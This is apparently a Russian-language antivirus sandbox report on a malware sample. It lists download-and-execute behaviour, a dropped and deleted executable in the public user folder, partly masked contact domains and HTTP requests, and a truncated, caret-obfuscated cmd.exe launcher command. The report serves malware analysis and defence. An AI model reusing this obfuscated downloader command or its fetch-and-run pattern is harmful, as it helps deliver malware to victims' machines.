Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /V/C"^s^e^t ^t^w^Z^x=^yv^a^ /^f^s^ ^I^8^f^ z^q^&^ ^P^f^S^ N^E^2^ ^`^\N ^D^5^m^ L^Z^d^ ^Tn^_^ v^D%^ ^'^k^]^ ^7^o^=^ ^*^+^e^ %n,^ ^$^3^w^ ^H^*^-^ ^lc^5^}^b^X)^}^?^.^=^{^5^T^Q^h%^\Rc^4^Z^~^t5C^&^a...
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\909.exe
Удаляет следующие файлы
- C:\users\public\909.exe
Сетевая активность
Подключается к
- 'ci######preendedora.org.br':80
- 'de####airloss.com':80
- 'je###bonczak.pl':80
TCP
Запросы HTTP GET
- http://www.de####airloss.com/VV
- http://ww##.##lhihairloss.com/VV?su#########################################
- http://www.je###bonczak.pl/fZz8
UDP
- DNS ASK gl##.cab
- DNS ASK ci######preendedora.org.br
- DNS ASK de####airloss.com
- DNS ASK ww##.##lhihairloss.com
- DNS ASK al####mavidus.com
- DNS ASK je###bonczak.pl
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V/C"^s^e^t ^t^w^Z^x=^yv^a^ /^f^s^ ^I^8^f^ z^q^&^ ^P^f^S^ N^E^2^ ^`^\N ^D^5^m^ L^Z^d^ ^Tn^_^ v^D%^ ^'^k^]^ ^7^o^=^ ^*^+^e^ %n,^ ^$^3^w^ ^H^*^-^ ^lc^5^}^b^X)^}^?^.^=^{^5^T^Q^h%^\Rc^4^Z^~^t5C^&^a...' (со скрытым окном)
